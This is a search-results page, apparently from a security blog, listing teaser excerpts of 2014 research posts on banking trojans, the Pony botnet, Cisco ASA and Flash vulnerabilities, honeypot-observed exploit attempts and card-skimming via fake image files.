Showing 49 results for: 2014 ×Security Research ×

Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail’s portfolio is to use links pointing to popular file hosting services. Over the past...

CVE-2014-2120 – A Tale of Cisco ASA “Zero-Day”

A few months ago I was trying to PoC a known cross-site scripting vulnerability in the Cisco ASA WebVPN portal (CVE-2013-3414) for inclusion in the TrustKeeper Scan Engine. I tried a number of different techniques on multiple different ASA versions/branches...

Baby's first NX+ASLR bypass

Recently, I've been trying to improve my skills with regards to exploiting memory corruption flaws. While I've done some work in the past with exploiting basic buffer overflows, format string issues, etc., I'd only done the most basic work in...

[Honeypot Alert] Open Flash Charts File Upload Attacks

Our web honeypots picked up some increased scanning/exploit activity for the following file upload vulnerability in Open Flash Charts - The following screenshot shows the contents of the vulnerable ofc_upload_image.php file: As you can see from this simple code, there...

[Honeypot Alert] JCE Joomla Extension Attacks

Our web honeypots picked up some increased exploit attempts for an old Joomla Content Editor (JCE) Extension vulnerability. Although this vulnerability is a few years old, botnet owners are heavily scanning for sites that are vulnerable and attempting to exploit...

ColdFusion Admin Compromise Analysis (CVE-2010-2861)

In a previous blog post, I provided "Method of Entry" analysis for a ColdFusion compromise baed on sanitized data from a SpiderLabs IR/Forensics team investigation which resulted in the attacker's installing a malicious IIS module that captured customer credit card...

WordPress XML-RPC PingBack Vulnerability Analysis

There were news stories this week outlining how attackers are abusing the XML-PRC "pingback" feature of WordPress blog sites to launch DDoS attacks on other sites. This blog post will provide some analysis on this attack and additional information for...

Deep Analysis of CVE-2014-0502 – A Double Free Story

A lot has already been said about CVE-2014-0502, the Adobe Flash Player zero-day that was part of a targeted attack that infected several nonprofit organizations’ websites. Several interesting aspects of the exploit were covered in various blog posts; including its...

Look What I Found: Pony is After Your Coins!

In our previous episode of "Look What I Found" we detailed our discovery of a humongous instance of a Pony botnet controller that stole credentials for approximately two million websites, social networks, e-mails and other types of accounts. We recently...

Wait a minute... that’s not a real JPG!

When attackers compromise a website and want to harvest credit cards, they need to either find where the data is stored or capture the data in transit. This blog post shows how identifying files with false file signatures can uncover...